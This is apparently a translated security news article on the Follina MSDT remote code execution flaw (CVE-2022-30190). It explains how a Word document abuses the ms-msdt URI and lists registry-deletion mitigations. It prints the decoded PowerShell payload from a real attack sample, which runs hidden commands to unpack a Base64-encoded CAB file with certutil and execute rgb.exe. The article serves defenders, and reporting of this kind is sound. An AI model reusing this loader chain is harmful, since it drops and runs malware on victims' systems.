The Microsoft Windows Support Diagnostic Tool (MSDT) for Windows has been exposed to a high-risk zero-day vulnerability, codenamed "Follina", that can be used to remotely execute code in Windows systems.
The vulnerability was first discovered and reported to Microsoft in April by researchers at the Shadow Chaser Group, and it was proven that the vulnerability had been exploited by hackers. The researcher said Microsoft initially flagged the vulnerability as not a "security-related issue ," but later closed the bug report citing a remote code execution vulnerability. Therefore, this long-discovered vulnerability was only recently marked with the number: CVE-2022-30190 .
Microsoft describes the vulnerability as follows:
"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application. The attacker could then install the program, view, change or Delete the data, or create a new account in the context permitted by the user's permissions."
According to researcher Kevin Beaumont's analysis, the document containing the attack vector uses Word to retrieve HTML files from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands. While in theory this is unlikely to be possible, in practice it can be done. When the commands in the document are decoded, they are converted to:
$cmd ="c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";The implementation principle of the script is as follows:
Run the following in a hidden window
1. Terminate msdt.exe if it is running
2. Loop through the files in the RAR file looking for the Base64 string
encoding the CAB file 3. Store this Base64 encoded CAB file as 1.t
4. Decode the Base64 encoded The CAB file is saved as 1.c
5. Expand the 1.c CAB file to the current directory, and finally:
6. Execute rgb.exe (probably compressed in the 1.c CAB file)
Microsoft has not yet released a patch to fix this vulnerability, but mitigations are provided to disable the MSDT URL protocol:
1. Run command prompt as administrator
2. To backup registry keys, execute command "reg export HKEY_CLASSES_ROOT\ms-msdt filename"
3. Execute command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f"